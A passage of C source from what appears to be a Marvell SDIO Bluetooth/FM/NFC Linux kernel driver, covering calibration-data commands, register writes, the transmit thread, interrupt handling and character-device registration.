 *  @param config_data  A pointer to calibrate data
 *  @param mac          A pointer to mac address (may be NULL)
 *
 *  @return             BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_load_cal_data(bt_private * priv, u8 * config_data, u8 * mac)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	int i = 0;
	/* Example payload kept for reference:
	 * u8 config_data[28] = {0x37 0x01 0x1c 0x00 0xFF 0xFF 0xFF 0xFF 0x01
	 * 0x7f 0x04 0x02 0x00 0x00 0xBA 0xCE 0xC0 0xC6 0x2D 0x00 0x00 0x00
	 * 0x00 0x00 0x00 0x00 0xF0}; */
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_LOAD_CONFIG_DATA;
	pcmd->length = 0x20;
	pcmd->data[0] = 0x00;
	pcmd->data[1] = 0x00;
	pcmd->data[2] = 0x00;
	pcmd->data[3] = 0x1C;
	/* swip cal-data byte: reverse each 4-byte group of config_data
	 * into data[4..31] */
	for (i = 4; i < 32; i++)
		pcmd->data[i] = config_data[(i / 4) * 8 - 1 - i];
	if (mac != NULL) {
		pcmd->data[2] = 0x01;	/* skip checksum */
		/* MAC goes in byte-reversed at data[24..29] */
		for (i = 24; i < 30; i++)
			pcmd->data[i] = mac[29 - i];
	}
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_LOAD_CONFIG_DATA;
	priv->adapter->cmd_complete = FALSE;
	DBG_HEXDUMP(DAT_D, "calirate data: ", pcmd->data, 32);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(ERROR, "BT: Load calibrate data: timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_LOAD_CONFIG_DATA);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function load the calibrate EXT data
 *
 *  @param priv         A pointer to bt_private structure
 *  @param config_data  A pointer to
calibrate data
 *  @param cfg_data_len Length of the calibrate data in bytes
 *
 *  @return             BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_load_cal_data_ext(bt_private * priv, u8 * config_data, u32 cfg_data_len)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_LOAD_CONFIG_DATA_EXT;
	pcmd->length = cfg_data_len;
	/* Payload is passed through unmodified, unlike bt_load_cal_data. */
	memcpy(pcmd->data, config_data, cfg_data_len);
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_LOAD_CONFIG_DATA_EXT;
	priv->adapter->cmd_complete = FALSE;
	/* sic: "calirate" typo is the original debug tag */
	DBG_HEXDUMP(DAT_D, "calirate ext data", pcmd->data, pcmd->length);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(ERROR, "BT: Load calibrate ext data: timeout:\n");
		bt_cmd_timeout_func(priv->adapter,
				    BT_CMD_LOAD_CONFIG_DATA_EXT);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function writes value to CSU registers
 *
 *  @param priv     A pointer to bt_private structure
 *  @param type     reg type
 *  @param offset   register address
 *  @param value    register value to write
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_write_reg(bt_private * priv, u8 type, u32 offset, u16 value)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CSU_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CSU_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CSU_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_CSU_WRITE_REG;
	pcmd->length = 7;
	pcmd->type = type;
	/* 32-bit offset and 16-bit value serialized little-endian. */
	pcmd->offset[0] = (offset & 0x000000ff);
	pcmd->offset[1] = (offset & 0x0000ff00) >> 8;
	pcmd->offset[2] = (offset & 0x00ff0000) >> 16;
	pcmd->offset[3] = (offset & 0xff000000) >> 24;
	pcmd->value[0] = (value & 0x00ff);
	pcmd->value[1] = (value & 0xff00) >> 8;
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, sizeof(BT_CSU_CMD));
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_CSU_WRITE_REG;
	priv->adapter->cmd_complete = FALSE;
	PRINTM(CMD, "BT: Set CSU reg type=%d reg=0x%x value=0x%x\n",
	       type, offset, value);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(ERROR, "BT: Set CSU reg timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_CSU_WRITE_REG);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function used to restore tx_queue
 *
 *  Moves every skb parked on pending_queue (filled while tx_lock was
 *  set) back onto tx_queue and wakes the main thread.
 *
 *  @param priv     A pointer to bt_private structure
 *  @return         N/A
 */
void
bt_restore_tx_queue(bt_private * priv)
{
	struct sk_buff *skb = NULL;
	while (!skb_queue_empty(&priv->adapter->pending_queue)) {
		skb = skb_dequeue(&priv->adapter->pending_queue);
		if (skb)
			skb_queue_tail(&priv->adapter->tx_queue, skb);
	}
	wake_up_interruptible(&priv->MainThread.waitQ);
}

/**
 *  @brief This function used to send command to firmware
 *
 *  Command format:
 *  +--------+--------+--------+--------+--------+--------+--------+
 *  |     OCF OGF     | Length |               Data                |
 *  +--------+--------+--------+--------+--------+--------+--------+
 *  |     2-byte      | 1-byte |              4-byte               |
 *  +--------+--------+--------+--------+--------+--------+--------+
 *
 *  Dispatches whichever one-shot command flags are set on bt_dev,
 *  clearing each flag before sending.
 *
 *  @param priv     A pointer to bt_private structure
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_prepare_command(bt_private * priv)
{
	int ret = BT_STATUS_SUCCESS;
	ENTER();
	if (priv->bt_dev.hscfgcmd) {
		priv->bt_dev.hscfgcmd = 0;
		ret = bt_send_hscfg_cmd(priv);
	}
	if (priv->bt_dev.pscmd) {
priv->bt_dev.pscmd = 0; ret = bt_enable_ps(priv); } if (priv->bt_dev.sdio_pull_ctrl) { priv->bt_dev.sdio_pull_ctrl = 0; ret = bt_send_sdio_pull_ctrl_cmd(priv); } if (priv->bt_dev.hscmd) { priv->bt_dev.hscmd = 0; if (priv->bt_dev.hsmode) ret = bt_enable_hs(priv); else { ret = sbi_wakeup_firmware(priv); priv->adapter->hs_state = HS_DEACTIVATED; } } LEAVE(); return ret; } /** @brief This function processes a single packet * * @param priv A pointer to bt_private structure * @param skb A pointer to skb which includes TX packet * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int send_single_packet(bt_private * priv, struct sk_buff *skb) { int ret; ENTER(); if (!skb || !skb->data) { LEAVE(); return BT_STATUS_FAILURE; } if (!skb->len || ((skb->len + BT_HEADER_LEN) > BT_UPLD_SIZE)) { PRINTM(ERROR, "Tx Error: Bad skb length %d : %d\n", skb->len, BT_UPLD_SIZE); LEAVE(); return BT_STATUS_FAILURE; } if (skb_headroom(skb) < BT_HEADER_LEN) { struct sk_buff *tmp = skb; skb = skb_realloc_headroom(skb, BT_HEADER_LEN); if (!skb) { PRINTM(ERROR, "TX error: realloc_headroom failed %d\n", BT_HEADER_LEN); skb = tmp; LEAVE(); return BT_STATUS_FAILURE; } kfree_skb(tmp); } /* This is SDIO specific header length: byte[3][2][1], * type: byte[0] (HCI_COMMAND = 1, ACL_DATA = 2, SCO_DATA = 3, 0xFE = Vendor) */ skb_push(skb, BT_HEADER_LEN); skb->data[0] = (skb->len & 0x0000ff); skb->data[1] = (skb->len & 0x00ff00) >> 8; skb->data[2] = (skb->len & 0xff0000) >> 16; skb->data[3] = bt_cb(skb)->pkt_type; if (bt_cb(skb)->pkt_type == MRVL_VENDOR_PKT) PRINTM(CMD, "DNLD_CMD: ocf_ogf=0x%x len=%d\n", *((u16 *) & skb->data[4]), skb->len); ret = sbi_host_to_card(priv, skb->data, skb->len); LEAVE(); return ret; } /** * @brief This function initializes the adapter structure * and set default value to the member of adapter. 
* * @param priv A pointer to bt_private structure * @return N/A */ static void bt_init_adapter(bt_private * priv) { ENTER(); skb_queue_head_init(&priv->adapter->tx_queue); skb_queue_head_init(&priv->adapter->pending_queue); priv->adapter->tx_lock = FALSE; priv->adapter->ps_state = PS_AWAKE; priv->adapter->suspend_fail = FALSE; priv->adapter->is_suspended = FALSE; priv->adapter->hs_skip = 0; priv->adapter->num_cmd_timeout = 0; init_waitqueue_head(&priv->adapter->cmd_wait_q); LEAVE(); } /** * @brief This function initializes firmware * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int bt_init_fw(bt_private * priv) { int ret = BT_STATUS_SUCCESS; ENTER(); if (fw == 0) { sd_enable_host_int(priv); goto done; } sd_disable_host_int(priv); if (sbi_download_fw(priv)) { PRINTM(ERROR, " FW failed to be download!\n"); ret = BT_STATUS_FAILURE; goto done; } done: LEAVE(); return ret; } /** * @brief This function frees the structure of adapter * * @param priv A pointer to bt_private structure * @return N/A */ void bt_free_adapter(bt_private * priv) { bt_adapter *adapter = priv->adapter; ENTER(); skb_queue_purge(&priv->adapter->tx_queue); /* Free the adapter object itself */ kfree(adapter); priv->adapter = NULL; LEAVE(); } /** * @brief This function handles the wrapper_dev ioctl * * @param hev A pointer to wrapper_dev structure * @cmd ioctl cmd * @arg argument * @return -ENOIOCTLCMD */ static int mdev_ioctl(struct m_dev *m_dev, unsigned int cmd, unsigned long arg) { ENTER(); LEAVE(); return -ENOIOCTLCMD; } /** * @brief This function handles wrapper device destruct * * @param m_dev A pointer to m_dev structure * * @return N/A */ static void mdev_destruct(struct m_dev *m_dev) { ENTER(); LEAVE(); return; } /** * @brief This function handles the wrapper device transmit * * @param m_dev A pointer to m_dev structure * @param skb A pointer to sk_buff structure * * @return BT_STATUS_SUCCESS or other error no. 
*/
static int
mdev_send_frame(struct m_dev *m_dev, struct sk_buff *skb)
{
	bt_private *priv = NULL;
	ENTER();
	if (!m_dev || !m_dev->driver_data) {
		PRINTM(ERROR, "Frame for unknown HCI device (m_dev=NULL)\n");
		LEAVE();
		return -ENODEV;
	}
	priv = (bt_private *) m_dev->driver_data;
	if (!test_bit(HCI_RUNNING, &m_dev->flags)) {
		PRINTM(ERROR, "Fail test HCI_RUNNING, flag=0x%lx\n",
		       m_dev->flags);
		LEAVE();
		return -EBUSY;
	}
	/* Per-type TX statistics. */
	switch (bt_cb(skb)->pkt_type) {
	case HCI_COMMAND_PKT:
		m_dev->stat.cmd_tx++;
		break;
	case HCI_ACLDATA_PKT:
		m_dev->stat.acl_tx++;
		break;
	case HCI_SCODATA_PKT:
		m_dev->stat.sco_tx++;
		break;
	}
	if (m_dev->dev_type == DEBUG_TYPE) {
		/* remember the ogf_ocf */
		priv->debug_device_pending = 1;
		priv->debug_ocf_ogf[0] = skb->data[0];
		priv->debug_ocf_ogf[1] = skb->data[1];
		PRINTM(CMD, "debug_ocf_ogf[0]=0x%x debug_ocf_ogf[1]=0x%x\n",
		       priv->debug_ocf_ogf[0], priv->debug_ocf_ogf[1]);
	}
	/* While tx_lock is held (during init/cal config) frames are parked
	 * on pending_queue and replayed later by bt_restore_tx_queue(). */
	if (priv->adapter->tx_lock == TRUE)
		skb_queue_tail(&priv->adapter->pending_queue, skb);
	else
		skb_queue_tail(&priv->adapter->tx_queue, skb);
	wake_up_interruptible(&priv->MainThread.waitQ);
	LEAVE();
	return BT_STATUS_SUCCESS;
}

/**
 *  @brief This function flushes the transmit queue
 *
 *  @param m_dev    A pointer to m_dev structure
 *
 *  @return         BT_STATUS_SUCCESS
 */
static int
mdev_flush(struct m_dev *m_dev)
{
	bt_private *priv = (bt_private *) m_dev->driver_data;
	ENTER();
	skb_queue_purge(&priv->adapter->tx_queue);
	skb_queue_purge(&priv->adapter->pending_queue);
	LEAVE();
	return BT_STATUS_SUCCESS;
}

/**
 *  @brief This function closes the wrapper device
 *
 *  @param m_dev    A pointer to m_dev structure
 *
 *  @return         BT_STATUS_SUCCESS
 */
static int
mdev_close(struct m_dev *m_dev)
{
	ENTER();
	mdev_req_lock(m_dev);
	if (!test_and_clear_bit(HCI_UP, &m_dev->flags)) {
		/* Already down: nothing to do. */
		mdev_req_unlock(m_dev);
		LEAVE();
		return 0;
	}
	if (m_dev->flush)
		m_dev->flush(m_dev);
	/* wait up pending read and unregister char dev */
	wake_up_interruptible(&m_dev->req_wait_q);
	/* Drop queues */
	skb_queue_purge(&m_dev->rx_q);
	if (!test_and_clear_bit(HCI_RUNNING, &m_dev->flags)) {
		mdev_req_unlock(m_dev);
		LEAVE();
		return 0;
	}
	/* Balances the try_module_get() done in mdev_open(). */
	module_put(THIS_MODULE);
	m_dev->flags = 0;
	mdev_req_unlock(m_dev);
	LEAVE();
	return BT_STATUS_SUCCESS;
}

/**
 *  @brief This function opens the wrapper device
 *
 *  @param m_dev    A pointer to m_dev structure
 *
 *  @return         BT_STATUS_SUCCESS or other
 */
static int
mdev_open(struct m_dev *m_dev)
{
	ENTER();
	if (try_module_get(THIS_MODULE) == 0)
		return BT_STATUS_FAILURE;
	set_bit(HCI_RUNNING, &m_dev->flags);
	LEAVE();
	return BT_STATUS_SUCCESS;
}

/**
 *  @brief This function queries the wrapper device
 *
 *  Copies the device type out to userspace.
 *
 *  @param m_dev    A pointer to m_dev structure
 *  @param arg      user-space destination address
 *
 *  @return         N/A
 */
void
mdev_query(struct m_dev *m_dev, unsigned long arg)
{
	struct mbt_dev *mbt_dev = (struct mbt_dev *)m_dev->dev_pointer;
	ENTER();
	if (copy_to_user((void *)arg, &mbt_dev->type, sizeof(mbt_dev->type)))
		PRINTM(ERROR, "IOCTL_QUERY_TYPE: Fail copy to user\n");
	LEAVE();
}

/**
 *  @brief This function initializes the wrapper device
 *
 *  Resets all fields and wires up the m_dev operation callbacks.
 *
 *  @param m_dev    A pointer to m_dev structure
 *
 *  @return         N/A
 */
void
init_m_dev(struct m_dev *m_dev)
{
	m_dev->dev_pointer = NULL;
	m_dev->driver_data = NULL;
	m_dev->dev_type = 0;
	m_dev->spec_type = 0;
	skb_queue_head_init(&m_dev->rx_q);
	init_waitqueue_head(&m_dev->req_wait_q);
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 37)
	init_MUTEX(&m_dev->req_lock);
#else
	sema_init(&m_dev->req_lock, 1);
#endif
	memset(&m_dev->stat, 0, sizeof(struct hci_dev_stats));
	m_dev->open = mdev_open;
	m_dev->close = mdev_close;
	m_dev->flush = mdev_flush;
	m_dev->send = mdev_send_frame;
	m_dev->destruct = mdev_destruct;
	m_dev->ioctl = mdev_ioctl;
	m_dev->query = mdev_query;
	m_dev->owner = THIS_MODULE;
	m_dev->poweroff = mdev_poweroff;
}

/**
 *  @brief This function handles the major job in bluetooth driver.
 *  it handles the event generated by firmware, rx data received
 *  from firmware and tx data sent from kernel.
* * @param data A pointer to bt_thread structure * @return BT_STATUS_SUCCESS */ static int bt_service_main_thread(void *data) { bt_thread *thread = data; bt_private *priv = thread->priv; bt_adapter *adapter = priv->adapter; wait_queue_t wait; struct sk_buff *skb; ENTER(); bt_activate_thread(thread); init_waitqueue_entry(&wait, current); current->flags |= PF_NOFREEZE; for (;;) { add_wait_queue(&thread->waitQ, &wait); OS_SET_THREAD_STATE(TASK_INTERRUPTIBLE); if (priv->adapter->WakeupTries || ((!priv->adapter->IntCounter) && (!priv->bt_dev.tx_dnld_rdy || skb_queue_empty(&priv->adapter->tx_queue)))) { PRINTM(INFO, "Main: Thread sleeping...\n"); schedule(); } OS_SET_THREAD_STATE(TASK_RUNNING); remove_wait_queue(&thread->waitQ, &wait); if (kthread_should_stop() || adapter->SurpriseRemoved) { PRINTM(INFO, "main-thread: break from main thread: " "SurpriseRemoved=0x%x\n", adapter->SurpriseRemoved); break; } PRINTM(INFO, "Main: Thread waking up...\n"); if (priv->adapter->IntCounter) { OS_INT_DISABLE; adapter->IntCounter = 0; OS_INT_RESTORE; sbi_get_int_status(priv); } else if ((priv->adapter->ps_state == PS_SLEEP) && !skb_queue_empty(&priv->adapter->tx_queue)) { priv->adapter->WakeupTries++; sbi_wakeup_firmware(priv); continue; } if (priv->adapter->ps_state == PS_SLEEP) continue; if (priv->bt_dev.tx_dnld_rdy == TRUE) { if (!skb_queue_empty(&priv->adapter->tx_queue)) { skb = skb_dequeue(&priv->adapter->tx_queue); if (skb) { if (send_single_packet(priv, skb)) ((struct m_dev *)skb->dev)-> stat.err_tx++; else ((struct m_dev *)skb->dev)-> stat.byte_tx += skb->len; kfree_skb(skb); } } } } bt_deactivate_thread(thread); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function handles the interrupt. it will change PS * state if applicable. it will wake up main_thread to handle * the interrupt event as well. 
* * @param m_dev A pointer to m_dev structure * @return N/A */ void bt_interrupt(struct m_dev *m_dev) { bt_private *priv = (bt_private *) m_dev->driver_data; ENTER(); if (!priv || !priv->adapter) { LEAVE(); return; } PRINTM(INTR, "*\n"); priv->adapter->ps_state = PS_AWAKE; if (priv->adapter->hs_state == HS_ACTIVATED) { PRINTM(CMD, "BT: %s: HS DEACTIVATED in ISR!\n", m_dev->name); priv->adapter->hs_state = HS_DEACTIVATED; } priv->adapter->WakeupTries = 0; priv->adapter->IntCounter++; wake_up_interruptible(&priv->MainThread.waitQ); LEAVE(); } static void char_dev_release_dynamic(struct kobject *kobj) { struct char_dev *cdev = container_of(kobj, struct char_dev, kobj); ENTER(); PRINTM(INFO, "free char_dev\n"); kfree(cdev); LEAVE(); } static struct kobj_type ktype_char_dev_dynamic = { .release = char_dev_release_dynamic, }; static struct char_dev * alloc_char_dev(void) { struct char_dev *cdev; ENTER(); cdev = kzalloc(sizeof(struct char_dev), GFP_KERNEL); if (cdev) { kobject_init(&cdev->kobj, &ktype_char_dev_dynamic); PRINTM(INFO, "alloc char_dev\n"); } return cdev; } static void bt_private_dynamic_release(struct kobject *kobj) { bt_private *priv = container_of(kobj, bt_private, kobj); ENTER(); PRINTM(INFO, "free bt priv\n"); kfree(priv); LEAVE(); } static struct kobj_type ktype_bt_private_dynamic = { .release = bt_private_dynamic_release, }; static bt_private * bt_alloc_priv(void) { bt_private *priv; ENTER(); priv = kzalloc(sizeof(bt_private), GFP_KERNEL); if (priv) { kobject_init(&priv->kobj, &ktype_bt_private_dynamic); PRINTM(INFO, "alloc bt priv\n"); } LEAVE(); return priv; } struct kobject * bt_priv_get(bt_private * priv) { PRINTM(INFO, "bt priv get object"); return kobject_get(&priv->kobj); } void bt_priv_put(bt_private * priv) { PRINTM(INFO, "bt priv put object"); kobject_put(&priv->kobj); } /** * @brief Module configuration and register device * * @param priv A Pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int 
sbi_register_conf_dpc(bt_private * priv) { int ret = BT_STATUS_SUCCESS; struct mbt_dev *mbt_dev = NULL; struct fm_dev *fm_dev = NULL; struct nfc_dev *nfc_dev = NULL; struct debug_dev *debug_dev = NULL; struct m_dev *m_dev = NULL; int i = 0; struct char_dev *char_dev = NULL; char dev_file[DEV_NAME_LEN + 5]; unsigned char dev_type = 0; ENTER(); priv->bt_dev.tx_dnld_rdy = TRUE; if (drv_mode & DRV_MODE_BT) { mbt_dev = alloc_mbt_dev(); if (!mbt_dev) { PRINTM(FATAL, "Can not allocate mbt dev\n"); ret = -ENOMEM; goto err_kmalloc; } init_m_dev(&(priv->bt_dev.m_dev[BT_SEQ])); priv->bt_dev.m_dev[BT_SEQ].dev_type = BT_TYPE; priv->bt_dev.m_dev[BT_SEQ].spec_type = IANYWHERE_SPEC; priv->bt_dev.m_dev[BT_SEQ].dev_pointer = (void *)mbt_dev; priv->bt_dev.m_dev[BT_SEQ].driver_data = priv; priv->bt_dev.m_dev[BT_SEQ].read_continue_flag = 0; } dev_type = HCI_SDIO; if (mbt_dev) mbt_dev->type = dev_type; ret = bt_send_module_cfg_cmd(priv, MODULE_BRINGUP_REQ); if (ret < 0) { PRINTM(FATAL, "Module cfg command send failed!\n"); goto done; } ret = bt_set_ble_deepsleep(priv, TRUE); if (ret < 0) { PRINTM(FATAL, "Enable BLE deepsleep failed!\n"); goto done; } if (psmode) { priv->bt_dev.psmode = TRUE; priv->bt_dev.idle_timeout = DEFAULT_IDLE_TIME; ret = bt_enable_ps(priv); if (ret < 0) { PRINTM(FATAL, "Enable PS mode failed!\n"); goto done; } } #ifdef SDIO_SUSPEND_RESUME priv->bt_dev.gpio_gap = 0x0864; ret = bt_send_hscfg_cmd(priv); if (ret < 0) { PRINTM(FATAL, "Send HSCFG failed!\n"); goto done; } #endif priv->bt_dev.sdio_pull_cfg = 0xffffffff; priv->bt_dev.sdio_pull_ctrl = 0; wake_up_interruptible(&priv->MainThread.waitQ); if (priv->bt_dev.devType == DEV_TYPE_AMP) { mbt_dev->type |= HCI_BT_AMP; priv->bt_dev.m_dev[BT_SEQ].dev_type = BT_AMP_TYPE; } /* block all the packet from bluez */ if (init_cfg || cal_cfg || bt_mac || cal_cfg_ext) priv->adapter->tx_lock = TRUE; if (mbt_dev) { /** init mbt_dev */ mbt_dev->flags = 0; mbt_dev->pkt_type = (HCI_DM1 | HCI_DH1 | HCI_HV1); mbt_dev->esco_type = 
(ESCO_HV1); mbt_dev->link_mode = (HCI_LM_ACCEPT); mbt_dev->idle_timeout = 0; mbt_dev->sniff_max_interval = 800; mbt_dev->sniff_min_interval = 80; for (i = 0; i < 3; i++) mbt_dev->reassembly[i] = NULL; atomic_set(&mbt_dev->promisc, 0); /** alloc char dev node */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = MBTCHAR_MINOR_BASE + mbtchar_minor; if (mbt_dev->type & HCI_BT_AMP) char_dev->dev_type = BT_AMP_TYPE; else char_dev->dev_type = BT_TYPE; if (bt_name) snprintf(mbt_dev->name, sizeof(mbt_dev->name), "%s%d", bt_name, mbtchar_minor); else snprintf(mbt_dev->name, sizeof(mbt_dev->name), "mbtchar%d", mbtchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", mbt_dev->name); mbtchar_minor++; PRINTM(MSG, "BT: Create %s\n", dev_file); /** register m_dev to BT char device */ priv->bt_dev.m_dev[BT_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** create BT char device node */ register_char_dev(char_dev, chardev_class, MODULE_NAME, mbt_dev->name); /** chmod & chown for BT char device */ mbtchar_chown(dev_file, AID_SYSTEM, AID_BLUETOOTH); mbtchar_chmod(dev_file, 0660); /** create proc device */ snprintf(priv->bt_dev.m_dev[BT_SEQ].name, sizeof(priv->bt_dev.m_dev[BT_SEQ].name), mbt_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[BT_SEQ]), BT_SEQ); } if ((drv_mode & DRV_MODE_FM) && (!(priv->bt_dev.devType == DEV_TYPE_AMP)) && (priv->bt_dev.devFeature & DEV_FEATURE_FM)) { /** alloc fm_dev */ fm_dev = alloc_fm_dev(); if (!fm_dev) { PRINTM(FATAL, "Can not allocate fm dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[FM_SEQ])); priv->bt_dev.m_dev[FM_SEQ].dev_type = FM_TYPE; priv->bt_dev.m_dev[FM_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[FM_SEQ].dev_pointer = (void *)fm_dev; priv->bt_dev.m_dev[FM_SEQ].driver_data = priv; priv->bt_dev.m_dev[FM_SEQ].read_continue_flag = 0; /** create char device for FM */ 
char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = FMCHAR_MINOR_BASE + fmchar_minor; char_dev->dev_type = FM_TYPE; if (fm_name) snprintf(fm_dev->name, sizeof(fm_dev->name), "%s%d", fm_name, fmchar_minor); else snprintf(fm_dev->name, sizeof(fm_dev->name), "mfmchar%d", fmchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", fm_dev->name); PRINTM(MSG, "BT: Create %s\n", dev_file); fmchar_minor++; /** register m_dev to FM char device */ priv->bt_dev.m_dev[FM_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[FM_SEQ]); /** register char dev */ register_char_dev(char_dev, chardev_class, MODULE_NAME, fm_dev->name); /** chmod for FM char device */ mbtchar_chmod(dev_file, 0660); /** create proc device */ snprintf(priv->bt_dev.m_dev[FM_SEQ].name, sizeof(priv->bt_dev.m_dev[FM_SEQ].name), fm_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[FM_SEQ]), FM_SEQ); } if ((drv_mode & DRV_MODE_NFC) && (!(priv->bt_dev.devType == DEV_TYPE_AMP)) && (priv->bt_dev.devFeature & DEV_FEATURE_NFC)) { /** alloc nfc_dev */ nfc_dev = alloc_nfc_dev(); if (!nfc_dev) { PRINTM(FATAL, "Can not allocate nfc dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[NFC_SEQ])); priv->bt_dev.m_dev[NFC_SEQ].dev_type = NFC_TYPE; priv->bt_dev.m_dev[NFC_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[NFC_SEQ].dev_pointer = (void *)nfc_dev; priv->bt_dev.m_dev[NFC_SEQ].driver_data = priv; priv->bt_dev.m_dev[NFC_SEQ].read_continue_flag = 0; /** create char device for NFC */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = NFCCHAR_MINOR_BASE + nfcchar_minor; char_dev->dev_type = NFC_TYPE; if (nfc_name) snprintf(nfc_dev->name, sizeof(nfc_dev->name), "%s%d", nfc_name, nfcchar_minor); else snprintf(nfc_dev->name, sizeof(nfc_dev->name), "mnfcchar%d", nfcchar_minor); snprintf(dev_file, 
sizeof(dev_file), "/dev/%s", nfc_dev->name); PRINTM(MSG, "BT: Create %s\n", dev_file); nfcchar_minor++; /** register m_dev to NFC char device */ priv->bt_dev.m_dev[NFC_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[NFC_SEQ]); /** register char dev */ register_char_dev(char_dev, chardev_class, MODULE_NAME, nfc_dev->name); /** chmod for NFC char device */ mbtchar_chmod(dev_file, 0666); /** create proc device */ snprintf(priv->bt_dev.m_dev[NFC_SEQ].name, sizeof(priv->bt_dev.m_dev[NFC_SEQ].name), nfc_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[NFC_SEQ]), NFC_SEQ); } if ((debug_intf) && ((drv_mode & DRV_MODE_BT) || (drv_mode & DRV_MODE_FM) || (drv_mode & DRV_MODE_NFC))) { /** alloc debug_dev */ debug_dev = alloc_debug_dev(); if (!debug_dev) { PRINTM(FATAL, "Can not allocate debug dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[DEBUG_SEQ])); priv->bt_dev.m_dev[DEBUG_SEQ].dev_type = DEBUG_TYPE; priv->bt_dev.m_dev[DEBUG_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[DEBUG_SEQ].dev_pointer = (void *)debug_dev; priv->bt_dev.m_dev[DEBUG_SEQ].driver_data = priv; /** create char device for Debug */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = DEBUGCHAR_MINOR_BASE + debugchar_minor; char_dev->dev_type = DEBUG_TYPE; if (debug_name) snprintf(debug_dev->name, sizeof(debug_dev->name), "%s%d", debug_name, debugchar_minor); else 